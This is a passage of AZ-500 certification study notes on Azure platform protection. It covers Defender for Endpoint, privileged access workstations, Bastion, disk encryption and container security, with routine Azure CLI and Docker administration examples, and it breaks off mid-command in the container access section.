        Automated investigation and remediation - In conjunction with being able to quickly respond to advanced attacks, Microsoft Defender for Endpoint offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.

        Microsoft Secure Score for Devices - Defender for Endpoint includes Microsoft Secure Score for Devices to help you dynamically assess the security state of your enterprise network, identify unprotected systems, and take recommended actions to improve the overall security of your organization.

        Microsoft Threat Experts - Microsoft Defender for Endpoint's new managed threat hunting service provides proactive hunting, prioritization, and additional context and insights that further empower Security operation centers (SOCs) to identify and respond to threats quickly and accurately.

        Defender for Endpoint customers need to apply for the Microsoft Threat Experts managed threat hunting service to get proactive Targeted Attack Notifications and to collaborate with experts on demand.

        Centralized configuration and administration, APIs - Integrate Microsoft Defender for Endpoint into your existing workflows.

        Integration with Microsoft solutions - Defender for Endpoint directly integrates with various Microsoft solutions, including:

        • Microsoft Defender for Cloud
        • Microsoft Sentinel
        • Intune
        • Microsoft Defender for Cloud Apps
        • Microsoft Defender for Identity
        • Microsoft Defender for Office
        • Skype for Business

        Microsoft 365 Defender - With Microsoft 365 Defender, Defender for Endpoint and various Microsoft security solutions form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attacks.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#32-privileged-access-device","title":"3.2. Privileged Access Device","text":"

        Zero Trust means that you don't purchase hardware from generic retailers, but only source it from an authorized OEM that supports Autopilot.

        For this solution, root of trust will be deployed using Windows Autopilot technology with hardware that meets the modern technical requirements. To secure a workstation, Autopilot lets you leverage Microsoft OEM-optimized Windows 10 devices. These devices come in a known good state from the manufacturer. Instead of reimaging a potentially insecure device, Autopilot can transform a Windows 10 device into a \u201cbusiness-ready\u201d state. It applies settings and policies, installs apps, and even changes the edition of Windows 10.

        To have a secured workstation you need to make sure the following security technologies are included on the device:

        • Trusted Platform Module (TPM) 2.0
        • BitLocker Drive Encryption
        • UEFI Secure Boot
        • Drivers and Firmware Distributed through Windows Update
        • Virtualization and HVCI Enabled
        • Drivers and Apps HVCI-Ready
        • Windows Hello
        • DMA I/O Protection
        • System Guard
        • Modern Standby

        Levels of device security

        | Device Type | Common usage scenario | Permitted activities | Security guidance |
        | --- | --- | --- | --- |
        | Enterprise Device | Home users, small business users, general purpose developers, and enterprise | Run any application, browse any website | Anti-malware and virus protection and policy based security posture for the enterprise |
        | Specialized Device | Specialized or secure enterprise users | Run approved applications, but cannot install apps. Email and web browsing allowed. No admin controls | No self administration of device, no application installation, policy based security, and endpoint management |
        | Privileged Device | Extremely sensitive roles | IT Operations | No local admins, no productivity tools, locked down browsing. PAW device |

        This chart shows the level of device security controls based on how the device will be used.

        A secure workstation requires it be part of an end-to-end approach including device security, account security, and security policies applied to the device at all times. Here are some common security measures you should consider implementing based on the users' needs.

        | Security Control | Enterprise Device | Specialized Device | Privileged Device |
        | --- | --- | --- | --- |
        | Microsoft Endpoint Manager (MEM) managed | Yes | Yes | Yes |
        | Deny BYOD Device enrollment | No | Yes | Yes |
        | MEM security baseline applied | Yes | Yes | Yes |
        | Microsoft Defender for Endpoint | Yes | Yes | Yes |
        | Join personal device via Autopilot | Yes | Yes | No |
        | URLs restricted to approved list | Allow Most | Allow Most | Deny Default |
        | Removal of admin rights | | Yes | Yes |
        | Application execution control (AppLocker) | | Audit -> Enforced | Yes |
        | Applications installed only by MEM | | Yes | Yes |
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#33-privileged-access-workstations-paw-workstations","title":"3.3. Privileged Access Workstations (PAW workstations)","text":"

        PAW is a hardened and locked down workstation designed to provide high security assurances for sensitive accounts and tasks. PAWs are recommended for administration of identity systems, cloud services, and private cloud fabric as well as sensitive business functions. In order to provide the greatest security, PAWs should always run the most up-to-date and secure operating system available: Microsoft strongly recommends Windows 10 Enterprise, which includes several additional security features not available in other editions (in particular, Credential Guard and Device Guard).

        • Internet attacks\u00a0- Isolating the PAW from the open internet is a key element to ensuring the PAW is not compromised.
        • Usability risk\u00a0- If a PAW is too difficult to use for daily tasks, administrators will be motivated to create workarounds to make their jobs easier.
        • Environment risks\u00a0- Minimizing the use of management tools and accounts that have access to the PAWs to secure and monitor these specialized workstations.
        • Supply chain tampering\u00a0- Taking a few key actions can mitigate critical attack vectors that are readily available to attackers. This includes validating the integrity of all installation media (Clean Source Principle) and using a trusted and reputable supplier for hardware and software.
        • Physical attacks\u00a0- Because PAWs can be physically mobile and used outside of physically secure facilities, they must be protected against attacks that leverage unauthorized physical access to the computer.

        This methodology is appropriate for accounts with access to high value assets:

        • Administrative Privileges\u00a0- PAWs provide increased security for high impact IT administrative roles and tasks. This architecture can be applied to administration of many types of systems including Active Directory Domains and Forests, Microsoft Entra tenants, Microsoft 365 tenants, Process Control Networks (PCN), Supervisory Control and Data Acquisition (SCADA) systems, Automated Teller Machines (ATMs), and Point of Sale (PoS) devices.
        • High Sensitivity Information workers\u00a0- The approach used in a PAW can also provide protection for highly sensitive information worker tasks and personnel such as those involving pre-announcement Merger and Acquisition activity, pre-release financial reports, organizational social media presence, executive communications, unpatented trade secrets, sensitive research, or other proprietary or sensitive data. This guidance does not discuss the configuration of these information worker scenarios in depth or include this scenario in the technical instructions.

        Administrative \"Jump Box\" architectures set up a small number administrative console servers and restrict personnel to using them for administrative tasks. This is typically based on remote desktop services, a 3rd-party presentation virtualization solution, or a Virtual Desktop Infrastructure (VDI) technology.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#34-virtual-machine-templates","title":"3.4. Virtual Machine templates","text":"

        Here are some additional terms to know when using Resource Manager:

        • Resource provider. A service that supplies Azure resources. For example, a common resource provider is Microsoft.Compute, which supplies the VM resource. Microsoft.Storage is another common resource provider.
        • Resource Manager template. A JSON file that defines one or more resources to deploy to a resource group or subscription. You can use the template to consistently and repeatedly deploy the resources.
        • Declarative syntax. Syntax that lets you state, \"Here\u2019s what I intend to create\" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.

        When you deploy a template, Resource Manager converts the template into REST API operations.

        Here are two different deployment schemas with the same result:
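
        For instance, a Resource Manager template can be validated and then deployed with the Azure CLI; the file name, resource group, and vmName parameter below are placeholders:

        # Validate the template against the target resource group first
        az deployment group validate \
          --resource-group MyRg \
          --template-file azuredeploy.json \
          --parameters vmName=MyVM

        # Deploy: Resource Manager converts the template into REST API operations
        az deployment group create \
          --resource-group MyRg \
          --template-file azuredeploy.json \
          --parameters vmName=MyVM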

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#35-remote-access-management-rdp-ssh-and-azure-bastion","title":"3.5. Remote Access Management: RDP, ssh, and Azure Bastion","text":"

        This topic explains how to connect to and sign into the virtual machines (VMs) you created on Azure. Once you've successfully connected, you can work with the VM as if you were locally logged on to its host server.

        Connect to a Windows VM - with RDP, with SSH, or with the Azure Bastion service. The Azure Bastion service is a fully platform-managed PaaS service that you provision inside your virtual network. It provides secure and seamless RDP/SSH connectivity to your virtual machines directly in the Azure portal over TLS. Bastion provides secure RDP and SSH connectivity to all the VMs in the virtual network in which it is provisioned. Using Azure Bastion protects your virtual machines from exposing RDP/SSH ports to the outside world, while still providing secure access using RDP/SSH. With Azure Bastion, you connect to the virtual machine directly from the Azure portal.

        Benefits of Bastion

        You can deploy bastion hosts (also known as jump-servers) at the public side of your perimeter network. Bastion host servers are designed and configured to withstand attacks. Bastion servers also provide RDP and SSH connectivity to the workloads sitting behind the bastion, as well as further inside the network.

        No hassle of managing NSGs: Azure Bastion is a fully managed platform PaaS service from Azure that is hardened internally to provide you with secure RDP/SSH connectivity. You don't need to apply any NSGs to the Azure Bastion subnet. Because Azure Bastion connects to your virtual machines over private IP, you can configure your NSGs to allow RDP/SSH from Azure Bastion only.

        Protection against port scanning: Because you do not need to expose your virtual machines to the public Internet, your VMs are protected against port scanning by rogue and malicious users located outside your virtual network.

        Protect against zero-day exploits. Hardening in one place only: Azure Bastion is a fully platform-managed PaaS service. Because it sits at the perimeter of your virtual network, you don\u2019t need to worry about hardening each of the virtual machines in your virtual network.
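
        A minimal Azure CLI sketch of a Bastion deployment (names and address prefix are placeholders; depending on CLI version, the bastion commands may require the bastion extension):

        # Bastion requires a dedicated subnet literally named AzureBastionSubnet
        az network vnet subnet create \
          --resource-group MyRg \
          --vnet-name MyVnet \
          --name AzureBastionSubnet \
          --address-prefixes 10.0.255.0/26

        # Bastion needs a Standard SKU public IP
        az network public-ip create \
          --resource-group MyRg \
          --name MyBastionIP \
          --sku Standard

        az network bastion create \
          --resource-group MyRg \
          --name MyBastion \
          --vnet-name MyVnet \
          --public-ip-address MyBastionIP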

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#36-update-management","title":"3.6. Update Management","text":"

        Azure Update Management is a service included as part of your Azure subscription. With Update Management, you can assess your update status across your environment and manage your Windows Server and Linux server updates from a single location\u2014for both your on-premises and Azure environments.

        Update Management is available at no additional cost (you pay only for the log data that Azure Log Analytics stores), and you can easily enable it for Azure and on-premises VMs. \u00a0You can also enable Update Management for VMs directly from your Azure Automation account.

        Configurations on managed computers:

        • Microsoft Monitoring Agent (MMA) for Windows or Linux.
        • PowerShell Desired State Configuration (DSC) for Linux.
        • Hybrid Runbook Worker in Azure Automation.
        • Microsoft Update or Windows Server Update Services (WSUS) for Windows computers.

        Azure Automation uses runbooks to install updates. When an update deployment is created, it creates a schedule that starts a master update runbook at the specified time for the included computers. The master runbook starts a child runbook on each agent to install the required updates.

        The Log Analytics agent for Windows and Linux needs to be installed on the VMs that are running on your corporate network or other cloud environment in order to enable them with Update Management.

        From your Azure Automation account, you can:

        • Onboard virtual machines
        • Assess the status of available updates
        • Schedule installation of required updates
        • Review deployment results to verify that updates were applied successfully to all virtual machines for which Update Management is enabled

        Azure Update Management provides the ability to deploy patches based on classifications. However, there are scenarios where you may want to explicitly list the exact set of patches. With update inclusion lists you can choose exactly which patches you want to deploy instead of relying on patch classifications.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#37-disk-encryption","title":"3.7. Disk encryption","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#windows","title":"WINDOWS","text":"

        Azure Disk Encryption for Windows VMs\u00a0helps protect and safeguard your data to meet your organizational security and compliance commitments. It uses the BitLocker feature of Windows to provide volume encryption for the OS and data disks of Azure virtual machines (VMs), and is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets. Azure Disk Encryption is zone resilient, the same way as Virtual Machines.

        Supported VMs. - Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage. Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines with less than 2 GB of memory.

        Supported operating systems:

        • Windows client: Windows 8 and later.
        • Windows Server: Windows Server 2008 R2 and later.
        • Windows 10 Enterprise multi-session.

        To enable Azure Disk Encryption, the VMs must meet the following network endpoint configuration requirements:

        • To get a token to connect to your key vault, the Windows VM must be able to connect to a Microsoft Entra endpoint, login.microsoftonline.com.
        • To write the encryption keys to your key vault, the Windows VM must be able to connect to the key vault endpoint.
        • The Windows VM must be able to connect to an Azure storage endpoint that hosts the Azure extension repository and an Azure storage account that hosts the VHD files.
        • If your security policy limits access from Azure VMs to the Internet, you can resolve the preceding URI and configure a specific rule to allow outbound connectivity to the IPs.

        Group Policy requirements. - Azure Disk Encryption uses the BitLocker external key protector for Windows VMs. For domain joined VMs, don't push any group policies that enforce TPM protectors. BitLocker policy on domain joined virtual machines with custom group policy must include the following setting: Configure user storage of BitLocker recovery information -> Allow 256-bit recovery key. Azure Disk Encryption will fail when custom group policy settings for BitLocker are incompatible. On machines that didn't have the correct policy setting, apply the new policy and force a policy update (gpupdate.exe /force); a restart may then be required. Azure Disk Encryption will also fail if domain-level group policy blocks the AES-CBC algorithm, which is used by BitLocker.

        Encryption key storage requirements. - Azure Disk Encryption requires an Azure Key Vault to control and manage disk encryption keys and secrets. Your key vault and VMs must reside in the same Azure region and subscription.
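
        A minimal Azure CLI sketch for enabling Azure Disk Encryption on a Windows VM (names are placeholders; the key vault must already exist, be enabled for disk encryption, and sit in the same region and subscription as the VM):

        az vm encryption enable \
          --resource-group MyRg \
          --name MyWindowsVM \
          --disk-encryption-keyvault MyKeyVault \
          --volume-type All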

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#linux","title":"LINUX","text":"

        Supported VMs. - \u00a0Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage.

        Note:\u00a0Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines that do not meet these minimum memory requirements:

        | Virtual machine | Minimum memory requirement |
        | --- | --- |
        | Linux VMs when only encrypting data volumes | 2 GB |
        | Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is 4 GB or less | 8 GB |
        | Linux VMs when encrypting both data and OS volumes, and where the root (/) file system usage is greater than 4 GB | The root file system usage * 2. For instance, 16 GB of root file system usage requires at least 32 GB of RAM |

        Once the OS disk encryption process is complete on Linux virtual machines, the VM can be configured to run with less memory.

        Azure Disk Encryption requires the dm-crypt and vfat modules to be present on the system. Removing or disabling vfat from the default image will prevent the system from reading the key volume and obtaining the key needed to unlock the disks on subsequent reboots. System hardening steps that remove the vfat module from the system are not compatible with Azure Disk Encryption.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#38-managed-disk-encryption-options","title":"3.8. Managed disk encryption options","text":"

        There are several types of encryption available for your managed disks, including Azure Disk Encryption (ADE), Server-Side Encryption (SSE), and encryption at the host.

        • Azure Disk Encryption (ADE) helps protect and safeguard your data to meet organizational security and compliance commitments. ADE encrypts the OS and data disks of Azure virtual machines (VMs) inside your VMs by using the device mapper DM-Crypt feature of Linux or the BitLocker feature of Windows. ADE is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets.
        • Azure Disk Storage Server-Side Encryption (also referred to as encryption-at-rest or Azure Storage encryption) automatically encrypts data stored on Azure-managed disks (OS and data disks) when persisting on the Storage Clusters. When configured with a Disk Encryption Set (DES), it supports customer-managed keys as well.
        • Encryption at the host ensures that data stored on the VM host hosting your VM is encrypted at rest and flows encrypted to the Storage clusters.
        • Confidential disk encryption binds disk encryption keys to the virtual machine's TPM (Trusted Platform Module) and makes the protected disk content accessible only to the VM. The TPM and VM guest state is always encrypted in attested code using keys released by a secure protocol that bypasses the hypervisor and host operating system. It is currently only available for the OS disk; encryption at the host may be used for other disks on a Confidential VM in addition to Confidential Disk Encryption.

        For\u00a0Encryption at the host\u00a0and\u00a0Confidential disk encryption, Microsoft Defender for Cloud does not detect the encryption state. We are in the process of updating Microsoft Defender.
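
        A minimal sketch of setting up server-side encryption with customer-managed keys via a Disk Encryption Set (all names are placeholders; the DES identity must also be granted access to the vault before disks can use it):

        # A key vault with purge protection, plus a key for the DES
        az keyvault create \
          --resource-group MyRg \
          --name MyKeyVault \
          --enable-purge-protection true

        az keyvault key create \
          --vault-name MyKeyVault \
          --name MyDiskKey \
          --protection software

        # Create the Disk Encryption Set referencing the customer-managed key
        az disk-encryption-set create \
          --resource-group MyRg \
          --name MyDES \
          --key-url "$(az keyvault key show --vault-name MyKeyVault --name MyDiskKey --query key.kid -o tsv)" \
          --source-vault MyKeyVault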

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#39-windows-defender","title":"3.9. Windows Defender","text":"

        Windows 10, Windows Server 2019, and Windows Server 2016 include key security features. They are Windows Defender Credential Guard, Windows Defender Device Guard, and Windows Defender Application Control.

        • Windows Defender Credential Guard: Introduced in Windows 10 Enterprise and Windows Server 2016, Windows Defender Credential Guard uses virtualization-based security enhancement to isolate secrets so that only privileged system software can access them. Unauthorized access to these secrets might lead to credential theft attacks, such as Pass-the-Hash or pass-the-ticket attacks. Windows Defender Credential Guard helps prevent these attacks by helping protect Integrated Windows Authentication (NTLM) password hashes, Kerberos authentication ticket-granting tickets, and credentials that applications store as domain credentials.
        • Windows Defender Application Control: Windows Defender Application Control helps mitigate these types of threats by restricting the applications that users can run and the code that runs in the system core, or kernel. Policies in Windows Defender Application Control also block unsigned scripts and MSIs, and Windows PowerShell runs in Constrained language mode.
        • Windows Defender Device Guard: The term device guard continues to describe the fully locked down state achieved by using Windows Defender Application Control, HVCI, and hardware and firmware security features. It also allows Microsoft to work with its original equipment manufacturer (OEM) partners to identify specifications for devices that are device guard capable, so that joint customers can easily purchase devices that meet all the hardware and firmware requirements of the original locked down scenario of Windows Defender Device Guard for Windows 10 devices.

        Microsoft Defender for Endpoint - Supported Operating Systems

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#310-microsoft-cloud-security-benchmark-in-defender-for-cloud","title":"3.10. Microsoft cloud security benchmark in Defender for Cloud","text":"

        The\u00a0Microsoft cloud security benchmark (MCSB)\u00a0provides prescriptive best practices and recommendations to help\u00a0improve the security of workloads,\u00a0data, and\u00a0services\u00a0on\u00a0Azure\u00a0and your\u00a0multicloud environment. This benchmark focuses on\u00a0cloud-centric control areas\u00a0with input from a set of\u00a0holistic Microsoft\u00a0and\u00a0industry security guidance\u00a0that includes:

        • Cloud Adoption Framework: Guidance on\u00a0security, including\u00a0strategy,\u00a0roles\u00a0and\u00a0responsibilities,\u00a0Azure Top 10 Security Best Practices, and\u00a0reference implementation.
        • Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
        • The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
        • Other industry and cloud service providers' security best practice standards and frameworks: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and the Payment Card Industry Data Security Standard (PCI-DSS).

        The Azure Security Benchmark (ASB), now part of the Microsoft cloud security benchmark (MCSB), helps you quickly work with different clouds by:

        • Providing a single control framework to easily meet the security controls across clouds
        • Providing consistent user experience for monitoring and enforcing the multicloud security benchmark in Defender for Cloud
        • Staying aligned with Industry Standards (e.g., Center for Internet Security, National Institute of Standards and Technology, Payment Card Industry)

        Automated control monitoring for AWS in Microsoft Defender for Cloud:\u00a0You can use\u00a0Microsoft Defender for Cloud Regulatory Compliance Dashboard\u00a0to monitor your AWS environment against\u00a0Microsoft cloud security benchmark (MCSB), just like how you monitor your Azure environment. We developed approximately\u00a0180 AWS checks\u00a0for the new AWS security guidance in MCSB, allowing you to monitor your AWS environment and resources in Microsoft Defender for Cloud.

        Some controls:

        | Control Domains | Description |
        | --- | --- |
        | Network security (NS) | Network Security covers controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS). |
        | Identity Management (IM) | Identity Management covers controls to establish a secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentications, managed identities (and service principals) for applications, conditional access, and account anomalies monitoring. |
        | Privileged Access (PA) | Privileged Access covers controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk. |
        | Data Protection (DP) | Data Protection covers control of data protection at rest, in transit, and via authorized access mechanisms, including discovering, classifying, protecting, and monitoring sensitive data assets using access control, encryption, key management, and certificate management. |
        | Asset Management (AM) | Asset Management covers controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory, and managing approvals for services and resources (inventory, track, and correct). |
        | Logging and Threat Detection (LT) | Logging and Threat Detection covers controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with a security event management (SEM) system, time synchronization, and log retention. |
        | Incident Response (IR) | Incident Response covers controls in the incident response life cycle - preparation, detection and analysis, containment, and post-incident activities, including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process. |
        | Posture and Vulnerability Management (PV) | Posture and Vulnerability Management focuses on controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources. |
        | Endpoint Security (ES) | Endpoint Security covers controls in endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware service for endpoints in cloud environments. |
        | Backup and Recovery (BR) | Backup and Recovery covers controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected. |
        | DevOps Security (DS) | DevOps Security covers the controls related to the security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure security throughout the DevOps process; it also includes common topics such as threat modeling and software supply security. |
        | Governance and Strategy (GS) | Governance and Strategy provides guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, unified technical strategy, and supporting policies and standards. |
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#311-microsoft-defender-for-cloud-recommendations","title":"3.11. Microsoft Defender for Cloud recommendations","text":"

        Using the\u00a0policies, Defender for Cloud periodically analyzes the compliance status of your resources to identify potential security misconfigurations and weaknesses. It then provides you with recommendations on how to remediate those issues. Recommendations result from assessing your resources against the relevant policies and identifying resources that aren't meeting your defined requirements.

        Defender for Cloud\u00a0makes its security recommendations based on your chosen initiatives. When a policy from your initiative is compared against your resources and finds one or more that aren't compliant, it is presented as a recommendation in Defender for Cloud.

        Recommendations\u00a0are actions for you to take to secure and harden your resources. In practice, it works like this:

        1. Azure Security Benchmark is an\u00a0initiative\u00a0that contains requirements. For example, Azure Storage accounts must restrict network access to reduce their attack surface.

        2. The initiative includes multiple\u00a0policies, each requiring a specific resource type. These policies enforce the requirements in the initiative. To continue the example, the storage requirement is enforced with the policy \"Storage accounts should restrict network access using virtual network rules.\"

        3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a\u00a0recommendation\u00a0to fix that situation and harden the security of resources that aren't meeting your security requirements. For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you'll see the recommendation to harden those resources.

        So, (1)\u00a0an initiative includes\u00a0(2)\u00a0policies that generate\u00a0(3)\u00a0environment-specific recommendations.
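
        To see which initiatives and policies are assigned at a given scope, and therefore which recommendations can be generated, a short Azure CLI sketch (the assignment name is a placeholder):

        # List policy and initiative assignments visible at the current subscription scope
        az policy assignment list --output table

        # Inspect one assignment in detail
        az policy assignment show --name MyAssignmentName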

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#4-containers-security","title":"4. Containers security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#41-containers","title":"4.1. Containers","text":"

        A container is an isolated, lightweight silo for running an application on the host operating system. Containers build on top of the host operating system's kernel (which can be thought of as the buried plumbing of the operating system), and contain only apps and some lightweight operating system APIs and services that run in user mode. While a container shares the host operating system's kernel, the container doesn't get unfettered access to it. Instead, the container gets an isolated\u2013and in some cases virtualized\u2013view of the system. For example, a container can access a virtualized version of the file system and registry, but any changes affect only the container and are discarded when it stops. To save data, the container can mount persistent storage such as an Azure Disk or a file share (including Azure Files).

        You need Docker in order to work with Windows Containers. Docker consists of the Docker Engine (dockerd.exe) and the Docker client (docker.exe).

        How it works. - A container builds on top of the kernel, but the kernel doesn't provide all of the APIs and services an app needs to run\u2013most of these are provided by system files (libraries) that run above the kernel in user mode. Because a container is isolated from the host's user mode environment, the container needs its own copy of these user mode system files, which are packaged into something known as a base image. The base image serves as the foundational layer upon which your container is built, providing it with operating system services not provided by the kernel.

        Because containers require far fewer resources (for example, they don't need a full OS), they're easy to deploy and they start fast. This allows you to have higher density, meaning that it allows you to run more services on the same hardware unit, thereby reducing costs. As a side effect of running on the same kernel, you get less isolation than VMs.

        Features

        Isolation. - Typically provides lightweight isolation from the host and other containers, but doesn't provide as strong a security boundary as a VM. (You can increase the security by using Hyper-V isolation mode to isolate each container in a lightweight VM).

        Operating System. - Runs the user mode portion of an operating system, and can be tailored to contain just the needed services for your app, using fewer system resources.

        Deployment. - Deploy individual containers by using Docker via command line; deploy multiple containers by using an orchestrator such as Azure Kubernetes Service.

        Persistent storage. - Use Azure Disks for local storage for a single node, or Azure Files (SMB shares) for storage shared by multiple nodes or servers.

        Fault tolerance. - If a cluster node fails, any containers running on it are rapidly recreated by the orchestrator on another cluster node.

        Networking. - Uses an isolated view of a virtual network adapter, providing a little less virtualization\u2013the host's firewall is shared with containers\u2013while using fewer resources.

        In Docker, each layer is the resulting set of changes that happen to the filesystem after executing a command, such as, installing a program. So, when you view the filesystem after the layer has been copied, you can view all the files, including the layer when the program was installed. You can think of an image as an auxiliary read-only hard disk ready to be installed in a \"computer\" where the operating system is already installed. Similarly, you can think of a container as the \"computer\" with the image hard disk installed. The container, just like a computer, can be powered on or off.
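
        As a quick illustration of the image/container analogy above (the tag shown is a public Microsoft base image, but any base image works the same way):

        # Pull a base image - the read-only "hard disk"
        docker pull mcr.microsoft.com/windows/nanoserver:ltsc2022

        # Start a container from it - the "computer" with that disk installed;
        # --rm discards the container's changes when it exits
        docker run -it --rm mcr.microsoft.com/windows/nanoserver:ltsc2022 cmd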

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#42-azure-container-instances-aci-security","title":"4.2. Azure Container Instances (ACI) security","text":"

        There are many security recommendations for Azure Container Instances, use these to optimize your security for containers.

        Use a private registry: Containers are built from images that are stored in one or more repositories. These repositories can belong to a public registry, like Docker Hub, or to a private registry. An example of a private registry is the Docker Trusted Registry, which can be installed on-premises or in a virtual private cloud. You can also use cloud-based private container registry services, including Azure Container Registry. A publicly available container image does not guarantee security. Container images consist of multiple software layers, and each software layer might have vulnerabilities. To help reduce the threat of attacks, you should store and retrieve images from a private registry, such as Azure Container Registry or Docker Trusted Registry. In addition to providing a managed private registry, Azure Container Registry supports service principal-based authentication through Microsoft Entra ID for basic authentication flows. This authentication includes role-based access for read-only (pull), write (push), and other permissions.
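
        A minimal sketch of creating an Azure Container Registry and pushing a locally built image to it (registry and image names are placeholders):

        # Create the private registry and authenticate the local Docker client
        az acr create --resource-group MyRg --name myprivateregistry --sku Basic
        az acr login --name myprivateregistry

        # Tag and push a local image into the private registry
        docker tag myapp:latest myprivateregistry.azurecr.io/myapp:latest
        docker push myprivateregistry.azurecr.io/myapp:latest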

        Monitor and scan container images continuously: Take advantage of solutions to scan container images in a private registry and identify potential vulnerabilities. It's important to understand the depth of threat detection that the different solutions provide. For example, Azure Container Registry optionally integrates with Microsoft Defender for Cloud to automatically scan all Linux images pushed to a registry. The Qualys scanner integrated with Microsoft Defender for Cloud detects image vulnerabilities, classifies them, and provides remediation guidance.

        Protect credentials: Containers can spread across several clusters and Azure regions. So, you must secure credentials required for logins or API access, such as passwords or tokens. Ensure that only privileged users can access those containers in transit and at rest. Inventory all credential secrets, and then require developers to use emerging secrets-management tools that are designed for container platforms. Make sure that your solution includes encrypted databases, TLS encryption for secrets data in transit, and least-privilege role-based access control. Azure Key Vault is a cloud service that safeguards encryption keys and secrets (such as certificates, connection strings, and passwords) for containerized applications. Because this data is sensitive and business critical, secure access to your key vaults so that only authorized applications and users can access them.

        Use vulnerability management as part of your container development lifecycle: By using effective vulnerability management throughout the container development lifecycle, you improve the odds that you identify and resolve security concerns before they become a more serious problem.

        Scan for vulnerabilities: New vulnerabilities are discovered all the time, so scanning for and identifying vulnerabilities is a continuous process. Incorporate vulnerability scanning throughout the container lifecycle.

        Ensure that only approved images are used in your environment: There\u2019s enough change and volatility in a container ecosystem without allowing unknown containers as well. Allow only approved container images. Have tools and processes in place to monitor for and prevent the use of unapproved container images. An effective way of reducing the attack surface and preventing developers from making critical security mistakes is to control the flow of container images into your development environment. Image signing or fingerprinting can provide a chain of custody that enables you to verify the integrity of the containers. For example, Azure Container Registry supports Docker's content trust model, which allows image publishers to sign images that are pushed to a registry, and image consumers to pull only signed images.

        Enforce least privileges in runtime: The concept of least privileges is a basic security best practice that also applies to containers. When a vulnerability is exploited, it generally gives the attacker access and privileges equal to those of the compromised application or process. Ensuring that containers operate with the lowest privileges and access required to get the job done reduces your exposure to risk.

        Reduce the container attack surface by removing unneeded privileges: You can also minimize the potential attack surface by removing any unused or unnecessary processes or privileges from the container runtime. Privileged containers run as root. If a malicious user or workload escapes from a privileged container, it will then run as root on that system.

        Log all container administrative user access for auditing: Maintain an accurate audit trail of administrative access to your container ecosystem, including your Kubernetes cluster, container registry, and container images. These logs might be necessary for auditing purposes and will be useful as forensic evidence after any security incident. Azure solutions include:

        • Integration of Azure Kubernetes Service with Microsoft Defender for Cloud to monitor the security configuration of the cluster environment and generate security recommendations
        • Azure Container Monitoring solution
        • Resource logs for Azure Container Instances and Azure Container Registry

        Container access

        • Azure Container Instances enables exposing your container groups directly to the internet with an IP address and a fully qualified domain name (FQDN). When you create a container instance, you can specify a custom DNS name label so your application is reachable at customlabel.azureregion.azurecontainer.io.
        • Azure Container Instances also supports executing a command in a running container by providing an interactive shell to help with application development and troubleshooting. Access takes place over HTTPS, using TLS to secure client connections.
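
        A minimal sketch of both access paths, assuming hypothetical names (rg-demo, aci-demo, customlabel):

        ```
        # Expose a container group with a custom DNS name label (hypothetical names)
        az container create \
          --resource-group rg-demo \
          --name aci-demo \
          --image mcr.microsoft.com/azuredocs/aci-helloworld \
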